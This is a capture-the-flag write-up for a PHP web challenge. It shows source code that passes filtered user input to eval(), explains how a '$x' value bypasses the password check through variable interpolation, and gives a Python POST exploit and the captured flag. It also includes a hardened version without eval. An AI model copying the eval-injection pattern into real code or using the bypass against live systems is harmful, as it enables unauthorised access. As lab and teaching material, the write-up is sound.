
# PeehPee

## Difficulty

Easy

## Points

150

## Description

Are you able to access the secret area of Naruto? I guess it's not that hard for you!

## Quick Analysis

View the application source code via the `/?source` endpoint:

```python
from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
```

```php
<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="admin@naruto.com"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }

        }
    }
}
?>
```

From the source code, to obtain the flag:

* The request method must be `POST`.
* The `email` parameter value must be `admin@naruto.com`.
* The `preg_replace` regex strips every character of the `pass` parameter that is not in `A-Z`, `a-z`, `0-9` or `$`.
* The filtered `pass` value must not equal `SuperSecRetPassw0rd`, otherwise the script dies with "Hacking Attempt detected".
* The filtered `pass` value is then embedded in a double-quoted PHP string and passed to `eval`, and the result is compared with `SuperSecRetPassw0rd`.
* The `test` parameter value is stored in the `$x` variable, which is in scope when `eval` runs.

Since the `pass` value is evaluated as a double-quoted string, any `$name` it contains is replaced with that variable's value. The `$` character survives the filter, so a `pass` of `$x` passes the first check (it is not the literal password) and then evaluates to the contents of `$x`, i.e. to whatever was sent in the `test` parameter. Sending `SuperSecRetPassw0rd` in `test` therefore makes the evaluated value match and returns the flag.
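To make the two checks easy to reason about, here is a small Python model of the challenge's decision logic next to a hardened version. This is an added example, not code from the writeup or the challenge: it re-implements the sanitizer with the same character class, models only the plain `$name` form of PHP double-quoted interpolation (the only form that survives the filter), and assumes the variable table is a plain dict. The hardened variant drops `eval` entirely and compares the submitted value in constant time.

```python
import hmac
import re

# Mirror of the challenge's sanitizer: remove every character that is not
# A-Z, a-z, 0-9 or '$' (same character class as the PHP preg_replace).
SANITIZE = re.compile(r"[^A-Za-z0-9$]")

# Plain "$name" references inside a PHP double-quoted string. Braces, brackets
# and "->" are stripped by the sanitizer, so this simple form is all that remains.
VAR_REF = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")

PASSWORD = "SuperSecRetPassw0rd"  # constructed stand-in for the real secret


def sanitize(value: str) -> str:
    """Apply the same filter as preg_replace("/[^A-Za-z0-9$]/", "", ...)."""
    return SANITIZE.sub("", value)


def interpolate(template: str, variables: dict) -> str:
    """Model PHP interpolation of "$name" in a double-quoted string.

    Unknown variables become "" (PHP emits a notice and uses an empty string).
    Assumption: 'variables' plays the role of the enclosing PHP scope.
    """
    return VAR_REF.sub(lambda m: str(variables.get(m.group(1), "")), template)


def vulnerable_check(form: dict) -> str:
    """Reproduce the challenge's decision logic: filter, literal check, then eval."""
    if form.get("email") != "admin@naruto.com":
        return "ignored"
    x = form.get("test", "")
    inp = sanitize(form.get("pass", ""))
    if inp == PASSWORD:
        return "Hacking Attempt detected"
    # eval("return \$inp=\"$inp\";") re-reads $inp as a double-quoted string,
    # so every "$name" inside it is replaced by that variable's current value.
    evaluated = interpolate(inp, {"x": x, "inp": inp})
    if evaluated == PASSWORD:
        return "flag"
    return "Pretty Close maybe ?"


def hardened_check(form: dict) -> str:
    """Same decision without eval: compare the submitted value directly, in constant time."""
    if form.get("email") != "admin@naruto.com":
        return "ignored"
    supplied = form.get("pass", "")
    if hmac.compare_digest(supplied.encode(), PASSWORD.encode()):
        return "flag"
    return "denied"


if __name__ == "__main__":
    # Constructed request bodies, shaped like the form the challenge accepts.
    bypass = {"email": "admin@naruto.com", "test": PASSWORD, "pass": "$x"}
    print("vulnerable:", vulnerable_check(bypass))  # the filter keeps "$x", eval resolves it
    print("hardened:  ", hardened_check(bypass))    # no eval, so "$x" is just a wrong password
```

The model makes the failure mode explicit: the blacklist check runs on the raw filtered string, but the value that is actually compared is produced by `eval` afterwards, so the two checks see different data. Removing `eval` (or never interpolating user input into code) is the fix; the constant-time comparison is the usual companion change for a password check.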

## Exploitation

```python
data = { 'email': 'admin@naruto.com', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)
```

### The Flag

```python
import re
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
```

```
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
```

